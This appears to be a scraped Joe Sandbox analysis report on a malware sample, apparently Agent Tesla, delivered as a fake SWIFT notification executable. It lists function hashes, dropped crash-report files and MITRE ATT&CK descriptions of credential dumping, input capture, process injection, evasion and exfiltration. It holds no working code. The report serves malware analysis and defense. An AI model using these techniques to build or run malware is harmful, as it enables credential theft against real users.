Opcode Fuzzy Hash: c60b1716e5f2615588d60e0bcfe6d0ce8b5f610712fdf65cc24035c334e43610
Instruction Fuzzy Hash: 76F0F6714043489EE7108A19DC88B63FFD8EF41774F18C45EFE484B286C378A844CAB0

Function 013714EC Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 469dbc4ca9fd9dc08344b079cba5ae986c6167aecb494d11b34a7e270d4340ef
Instruction ID: 7e45fa235532b339ddf9ea4caf9e22941bfbbf21675e5420840d39e145014b74
Opcode Fuzzy Hash: 469dbc4ca9fd9dc08344b079cba5ae986c6167aecb494d11b34a7e270d4340ef
Instruction Fuzzy Hash: BEF0F037E041508BDB328BBC88911ACBBB0FAAA269B1900DBD945FB611D23CE806C751

Function 01378180 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4521382528.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1370000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0926480f9246d6bea8375fc8b2ba841130b2e3c6254716b2836c338dcc8b8c37
Instruction ID: 167099c8975e4ef302b463c598ca794b322ee18f658caaa4cc27aa81140f6505
Opcode Fuzzy Hash: 0926480f9246d6bea8375fc8b2ba841130b2e3c6254716b2836c338dcc8b8c37
Instruction Fuzzy Hash: 66F0447493010B9FCB05FBB8FA40ADD7BB2EB40300F609569D90597259EF342E55CB90

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EUR Swift Bildirimi12-08-2024.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_EUR Swift Bildir_95897f576a7a37ff17dbbf01c9c2de1ec6ff68_f267abce_d8c0565f-219c-4f80-baef-a8f9636ecb31\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE81.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF047.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF087.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Windows Analysis Report
EUR Swift Bildirimi12-08-2024.exe

Function 00007FF848DAAB40 Relevance: 2.0, Strings: 1, Instructions: 734
COMMON

Function 00007FF848DAD16D Relevance: 1.5, Strings: 1, Instructions: 269
COMMON

Function 00007FF848DABEF0 Relevance: 1.6, APIs: 1, Instructions: 149
memoryCOMMON

Function 00007FF848DA092D Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Function 00007FF848DA06B0 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Function 01376EA2 Relevance: 2.6, Strings: 2, Instructions: 147
COMMON

Function 0623E0D8 Relevance: 1.6, APIs: 1, Instructions: 133
COMMON

Function 0623E1C0 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre